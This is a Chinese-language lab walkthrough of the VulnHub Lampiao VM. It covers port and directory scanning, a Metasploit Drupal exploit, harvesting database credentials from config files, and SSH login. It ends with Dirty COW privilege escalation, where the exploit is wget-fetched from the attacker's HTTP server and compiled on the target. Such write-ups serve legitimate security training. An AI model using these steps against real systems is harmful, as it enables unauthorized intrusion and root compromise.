vulnhub-lampiao靶机练习

vulnhub-lampiao靶机练习,第1张

vulnhub-lampiao靶机练习 第一步:信息收集

Nmap –sS –p 1-65535 192.168.231.1-255   (靶机使用的是nat模式,和攻击机处于同一网段,所以扫描231.1-255整个网段的地址排除攻击机kali的ip就可以判断出靶机的ip)

 

我们可以看到到靶机开放了22(ssh),80(http),1898端口,

 

 可以通过dirmap 扫描目录

Python3 dirmap.py –i http:192.168.231.139 –lcf

 先访问80端口看一下网站长啥样,有没有可以利用的点,发现是作者在鼓励我,难道作者也知道我很菜吗!

 再尝试1898端口,通过访问1898下的robots.txt文件可以得知里边存在changelog.txt

可以通过changelog日志查看到使用的cms是drupal7.45

 

第二部:利用漏洞渗透

Kali msf ,Search drupal,Use 相应的模块,Show options

 

Set rhost 192.168.231.139

Set rport 1898

Exploite

直接就getshell

 Python –c ‘import pty;pty.spawn(“/bin/bash”)

得到一个交互界面

进一步信息收集 ls查看一下都有啥文件

这个时候肯定比目录扫描扫出来的文件要多

Sites目录下保存着默认配置, Cd /home 目录下,ls查看目录中存在拿些用户

结果就发现了一个用户名为tiago的用户

通过查看sites里的文件竟然发现了数据的账户和密码

前边信息收集我们得知,靶机开放着22端口,可以尝试ssh登录下

Ssh tiago@192.168.231.139

 登陆完成后发现权限仍然也不高

第三步:提权获取flag

那就该提权啦

Uname-a 查看linux版本是否可以用脏牛提权 发现是可以的

Kali自带脏牛exp

攻击机searchsploite dirty

会发现有一个40847.cpp的文件

Locate /linux/local/40847.cpp 查看exp的完整路径,复制一份到root目录下

 本机在root目录下搭建一个http服务

Python3 –m http.server

 靶机上执行

Wget http:192.168.231.129:8000/40847.cpp (最好切换到/tmp目录下执行)

 

然后编译一下cpp文件 最后脏牛就生成啦

直接运行,运行完成后是root权限啦,ls查看下会发现flag

 到这里就结束了

lampiao靶场整体难度特别简单,但是身为菜鸡的我还是看了网上大佬们的writeup,如果有不对的地方还请多多指教.

 

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zaji/5435703.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-12-11
下一篇 2022-12-11

发表评论

登录后才能评论

评论列表(0条)

保存